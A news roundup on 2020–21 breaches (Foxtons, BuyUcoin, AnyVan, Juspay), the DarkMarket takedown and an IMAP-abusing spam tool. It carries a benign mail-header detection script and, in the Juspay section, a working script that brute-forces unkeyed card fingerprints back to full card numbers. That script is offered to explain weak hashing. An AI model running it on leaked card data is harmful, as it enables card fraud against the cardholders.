Estate agent Foxtons Group is under pressure after the daily newspaper i reported that customers' card details and other personal information had been uploaded to a dark web site. According to the i, a customer discovered card details, addresses and personal messages belonging to more than 16,000 individuals on 12 October last year. 

The exposed data relates to customers from before 2010, but nearly one-fifth of the cards are still active. Threat actors commonly advertise a haul by publishing a small sample before selling the full set privately, so the relatively small volume posted online says little about how many clients are actually affected. 

Foxtons Group was notified of the published data three weeks ago by the customer who discovered it, but according to the report the agency had not yet informed its clients or the authorities. 

The leaked files have reportedly been viewed more than 15,000 times in the last three months. Foxtons Group said in a statement that its Alexander Hall mortgage broking business was hit by malware in October 2020, in an attack that also affected many other firms.

“Some IT systems were affected for several days but were restored without significant disruption to customers. All necessary disclosures have been made and full details of the attack were provided to the FCA and ICO at the time. We are satisfied that the attack did not result in the loss of any data that could be damaging to customers and believe that the ICO and FCA are satisfied with our response”, Foxtons Group stated.

The CTO of Cortex Insight, Stephen Kapp stated that “it is safe to assume the worst, and Foxton customers should look to protect themselves from identity fraud and card fraud as a result of this breach. With both personal information and payment card information lost, Foxtons customers should take some time to validate payments and potential credit history interactions since October and flag anything suspicious to their bank”.

Indian Crypto Exchange BuyUcoin Hacked

 

In yet another data breach, sensitive information on almost 3.25 lakh customers of the India-based cryptocurrency exchange and wallet BuyUcoin has been exposed on the dark web. The leaked data includes names, email addresses, mobile numbers, hashed passwords, wallet details, order details, bank details, KYC details (PAN and passport numbers) and deposit history. 

Founded in July 2016 and based in Delhi-NCR, BuyUcoin is a cryptocurrency wallet and exchange on which buyers and sellers trade digital assets such as bitcoin, ethereum and ripple. 

According to independent cybersecurity researcher Rajshekhar Rajaharia, the leak is a 6 GB MongoDB dump containing three backup files of BuyUcoin data. 

"This is a serious hack as key financial, banking and KYC details have been leaked on the Dark Web," Rajaharia said and shared some screenshots of the leaked information. 

The leaked data could be used to run fraud against the affected users, the researcher said, adding that the transaction details would also let attackers infer victims' creditworthiness. 

Researchers at cybersecurity firm KELA Research and Strategy Ltd first spotted the stolen data, posted on the same forum alongside data from Wongnai Media Co Ltd, Tuned Global Pvt Ltd, Wappalyzer, Teespring Inc and Bonobos.com, a pattern that bears the hallmarks of the notorious ShinyHunters group. "Over this past summer, ShinyHunters was seen publishing leaked information for free, uncovering a large number of individual records from all over the world," said Victoria Kivilevich, threat intelligence analyst at KELA. 

According to Rajaharia, the same actor earlier leaked BigBasket and JusPay data in India. In November last year BigBasket, one of India's best-known online grocers, found data on more than 20 million customers for sale on the dark web for more than $40,000. More recently, Bengaluru-based payments gateway JusPay said that about 3.5 crore records containing masked card data and card fingerprints had been compromised. 

While denying the leak, BuyUcoin CEO and Co-founder Shivam Thakral said, “We would like to reiterate the fact that only dummy data of 200 entries were impacted which was immediately recovered and secured by our automated security systems.”

AnyVan: 4.1 Million Users Compromised in Data Breach

 

AnyVan, headquartered in Hammersmith, London, is a European online marketplace through which customers book delivery, transport and removal services from its network of transport partners; it operates in Europe only. One of Europe's leading moving platforms, it matches a customer's route with transporters already travelling that way, cutting costs and CO2 emissions by filling otherwise empty load space. AnyVan has now told its users that attackers gained unauthorised access to their personal details. 

The company notified customers by email. It said it had discovered the incident on 31 December 2020 and explained why customers were only now being informed. 

AnyVan in regards to the aforementioned incident stated that “This leaking of data came to our attention on the 31st December, but we understand the incident itself occurred at the end of September. As soon as the incident came to our attention, our specialist IT team investigated it and have since taken the following remedial action: all passwords have been changed."

According to the notice, customers' names, email addresses and cryptographic hashes of their passwords were accessed and have probably been posted on the dark web; no other sensitive data appears to have been taken, and the investigation continues. The notice does not say which hashing scheme was used, and that matters: unsalted or fast hashes can be cracked offline, which is why the password-change advice should not be ignored. The notification also came months after the late-September intrusion, leaving the attackers ample time to exploit the data. An estimated 4.1 million users are affected. According to the report, AnyVan had not notified the ICO (Information Commissioner’s Office), a step that would be expected given that customer data was compromised.

As a precaution, the company advised customers to change their AnyVan password and review the other details held on their account, and warned them not to disclose further personal information to anyone who asks for it. AnyVan apologised for the breach and for the inconvenience caused.

DarkMarket Taken Down in International Operation

 

DarkMarket, reportedly the world's largest dark web marketplace, has been taken down in an international operation coordinated by Europol, according to authorities. Europol supported the takedown with specialist operational analysis and coordinated the cross-border effort of the participating countries.

Over the weekend, the Central Criminal Investigation Department in the German city of Oldenburg arrested an Australian national, the alleged operator of DarkMarket, near the German-Danish border. The investigation, led by the cybercrime unit of the Koblenz Public Prosecutor's Office, allowed officers to locate and close the marketplace, switch off its servers and seize its infrastructure: more than 20 servers in Moldova and Ukraine, with support from the German Federal Criminal Police Office (BKA). The data stored on them is expected to give investigators new leads on the site's moderators, sellers and buyers.

Before its closure, DarkMarket had nearly 500,000 users and had facilitated more than 320,000 transactions, according to Europol. The marketplace traded everything from drugs and counterfeit money to stolen credit card details and malware. Europol estimates that the equivalent of €140 million changed hands on the site, in a mix of bitcoin and monero. European authorities intend to use the seized servers from Ukraine and Moldova to investigate the buyers and sellers who used the site for criminal transactions.

The DarkMarket bust is not the first time German authorities have found illegal platform operators on German soil. In 2019, Koblenz prosecutors announced the discovery of darknet servers hosted in a former NATO bunker in a sleepy German town. Authorities say the probe that uncovered DarkMarket involved a months-long international law enforcement operation; US agencies including the FBI, the DEA and the IRS contributed, alongside police from Australia, Britain, Denmark, Switzerland, Ukraine and Moldova, with Europol in a "coordinating role." 

DarkMarket is the latest in a line of dark web marketplace takedowns that began with Silk Road in 2013; in recent years international law enforcement operations have also shut down AlphaBay and Wall Street Market, which were likewise used to sell drugs and other illegal goods.

Russian-Language Darknet Tool Bypasses Spam Protection by Abusing IMAP

A program sold on a Russian-language darknet site lets spammers deliver messages while bypassing network and email filtering. It abuses a standard feature of the IMAP protocol.

A new tool for spammers, actively sold on the darknet, bypasses the standard protections around email accounts. By using a feature of the Internet Message Access Protocol (IMAP), attackers upload the messages they want delivered directly into victims' mailboxes. Because the message never enters through SMTP, inbound spam and malware filters never see it.

The attack requires that the attackers already hold valid credentials for the victim's account. The tool, called Email Appender, has been advertised on Russian-language hacker forums since autumn 2020.

The author sells access by subscription: $50 for a day, $300 for a week or $1,000 per month. That is expensive, but judging by recent campaigns, demand for the service is high.

Researchers at email security firm Vade Secure report that companies in Italy, France, Denmark and the United States have already been hit by large-scale spam campaigns using Email Appender. One affected organisation says it received 300,000 spam messages in a single day and had to spend substantial resources disabling compromised accounts or resetting their credentials.

Databases of email usernames and passwords are widely sold on hacker forums. According to Gemini Advisory, an attacker loads such a database into Email Appender, which attempts to log in to each account over IMAP with the listed credentials; wherever a login succeeds, it uses IMAP's APPEND command to place ready-made messages directly into the mailbox.
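A message placed with APPEND is stored exactly as the client uploaded it, so unless the spammer forges them it carries none of the trace headers a relayed message acquires. The script below is an added example, not code from the page or from any of the vendors quoted; it scans raw messages from a mailbox dump for that gap. The two messages, the domains and the `mx.victim.example` host are constructed for the example.

```python
"""Flag mailbox messages that show no trace of SMTP delivery (added example)."""
import email
from email import policy
from email.utils import parseaddr

# Constructed sample: a normally delivered message. The receiving MTA added a
# Received: trace header and recorded the SPF result.
DELIVERED = b"""Received: from mail.partner.example (mail.partner.example [203.0.113.7])
\tby mx.victim.example (Postfix) with ESMTPS id 1A2B3C
\tfor <alice@victim.example>; Mon, 11 Jan 2021 09:12:03 +0000
Authentication-Results: mx.victim.example; spf=pass smtp.mailfrom=partner.example
From: Bob <bob@partner.example>
To: alice@victim.example
Subject: Q1 planning
Message-ID: <20210111.1@partner.example>

See you Monday.
"""

# Constructed sample of an APPENDed message: the headers are whatever the tool
# chose to write, and nothing records how the message arrived.
APPENDED = b"""From: IT Support <support@victim.example>
To: alice@victim.example
Subject: Your password expires today
Message-ID: <1@victim.example>

Keep your account: http://login.example.invalid/reset
"""


def suspicious_reasons(raw, local_domains):
    """Return the reasons a raw message looks uploaded rather than delivered.

    An empty list means the message shows normal delivery traces. A careful
    attacker can forge both headers, so a non-empty list is a lead, not proof.
    """
    msg = email.message_from_bytes(raw, policy=policy.default)
    reasons = []
    received = msg.get_all("Received") or []
    if not received:
        reasons.append("no Received: headers (never relayed by an MTA)")
    if msg.get("Authentication-Results") is None:
        reasons.append("no Authentication-Results: (SPF/DKIM never evaluated)")
    _, sender = parseaddr(msg.get("From", ""))
    domain = sender.rpartition("@")[2].lower()
    if domain in local_domains and not received:
        reasons.append("claims an internal sender yet bypassed inbound delivery")
    return reasons


def scan(messages, local_domains):
    """Map each message label to its list of reasons."""
    return {label: suspicious_reasons(raw, local_domains) for label, raw in messages.items()}


if __name__ == "__main__":
    for label, reasons in scan({"delivered": DELIVERED, "appended": APPENDED}, {"victim.example"}).items():
        print(label, "->", reasons or "looks delivered")
```

The header check is useful for cleaning up after the fact; the better detection point is the login itself, since every APPEND is preceded by an IMAP authentication with stolen credentials, usually from an address the account owner has never used.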

"There are a number of ways to block such spam campaigns, but the main one is to regularly change passwords and not reuse the same (or a similar) combination," said Alexey Vodiasov, technical director of SEC Consult Services.

Two-factor authentication is also effective, Vodiasov said, since even a compromised password cannot then be used to connect without alerting the account's rightful owner.

He added that notifications of logins from unusual IP addresses should be enabled; most mail systems support this.

Massive Data Dump of 10 Crore Indian Card Holders Leaked on Dark Web

 

The data of 10 crore Indian cardholders has been put up for sale on the dark web for an undisclosed sum, according to independent cybersecurity researcher Rajshekhar Rajaharia, who says attackers compromised a server of Bengaluru-based digital payments gateway Juspay and then leaked the debit and credit card data of 10 crore Indian cardholders.

Juspay told IANS that media reports were misleading users and that they need not worry about their financial information: no card numbers had leaked, it said, and the number of affected records was far below the 10 crore figure. 

While giving insights into the security incident, Juspay told, “on August 18, 2020, an unauthorized attempt on our servers was detected and terminated when in progress. No card numbers, financial credentials or transaction data were compromised; some data records containing non-anonymized, plain-text email and phone numbers were compromised, which form a fraction of the 10 Crore data records”. 

Rajshekhar Rajaharia disagreed, saying that the financial information of all 10 crore cardholders is in jeopardy if the attackers can identify the hash algorithm used to generate the card fingerprint, because with it they could decrypt the concealed card numbers.

Juspay was founded in August 2012 by two former Amazon engineers, Ramanathan RV and Vimal Kumar, later joined by former Bloomberg executive Sheetal Lalwani. The company has raised a total of $21.6 million; its last funding round was in March 2020. 

The data on the dark web reportedly contains debit and credit card details including expiry date, card fingerprint, ISIN, card type, card brand (Visa/RuPay/Mastercard), the last four digits of the card number and the user account ID.
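The disagreement above turns on what a "card fingerprint" actually protects, and the answer is a matter of arithmetic rather than decryption: a hash is not decrypted, it is guessed. The script below is an added example, not Juspay's code or a description of how its fingerprints are built; it assumes, as is typical of masked card data, that the leaked record exposes the first six digits (the issuer identification number) and the last four, leaving six unknown digits of a 16-digit PAN, one of which the Luhn check digit pins down. It then shows that an unkeyed SHA-256 fingerprint is recovered by enumerating the remaining 100,000 candidates, while a keyed fingerprint (HMAC with a server-side secret, the `b"server-side secret"` key here being a placeholder) is not. The test card number is the standard Visa test PAN, not a real card.

```python
"""Why an unkeyed hash is not a safe card fingerprint (added example)."""
import hashlib
import hmac


def luhn_sum(pan):
    """Luhn weighted digit sum; a PAN is valid when the sum is 0 mod 10."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:  # every second digit from the right is doubled
            d = d * 2 if d < 5 else d * 2 - 9
        total += d
    return total


def luhn_valid(pan):
    return luhn_sum(pan) % 10 == 0


def fingerprint_unkeyed(pan):
    """The weak construction: anyone can compute it for any candidate PAN."""
    return hashlib.sha256(pan.encode()).hexdigest()


def fingerprint_keyed(pan, key):
    """The sound construction: needs a secret the attacker does not hold."""
    return hmac.new(key, pan.encode(), hashlib.sha256).hexdigest()


def candidate_pans(bin6, last4):
    """Yield every Luhn-valid 16-digit PAN with the given BIN and last four.

    Five of the six unknown digits are enumerated. The sixth sits at
    position 12 of 16, which Luhn does not double, so it is solved directly
    from the sum of the other fifteen digits instead of enumerated.
    """
    for head in range(100_000):
        partial = f"{bin6}{head:05d}0{last4}"   # placeholder 0 contributes nothing
        fix = (-luhn_sum(partial)) % 10
        yield f"{bin6}{head:05d}{fix}{last4}"


def recover_pan(fingerprint, bin6, last4):
    """Brute-force an unkeyed fingerprint back to its PAN; None if nothing matches."""
    for pan in candidate_pans(bin6, last4):
        if fingerprint_unkeyed(pan) == fingerprint:
            return pan
    return None


if __name__ == "__main__":
    pan = "4111111111111111"  # standard Visa test number, not a real card
    leaked = fingerprint_unkeyed(pan)
    print("unkeyed SHA-256 recovered:", recover_pan(leaked, pan[:6], pan[-4:]))
    protected = fingerprint_keyed(pan, b"server-side secret")  # placeholder key
    print("HMAC fingerprint recovered:", recover_pan(protected, pan[:6], pan[-4:]))
```

The enumeration finishes in well under a second per card on a laptop, which is why masked digits plus an unkeyed hash leak the full PAN for free; a keyed fingerprint, or a tokenisation vault that holds no reversible relationship to the PAN at all, is what makes "masked" data genuinely low value.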

A company spokesperson acknowledged that some contact numbers and email addresses were leaked, which he said have little to no value, and denied that any card numbers, transaction data or order information were accessed.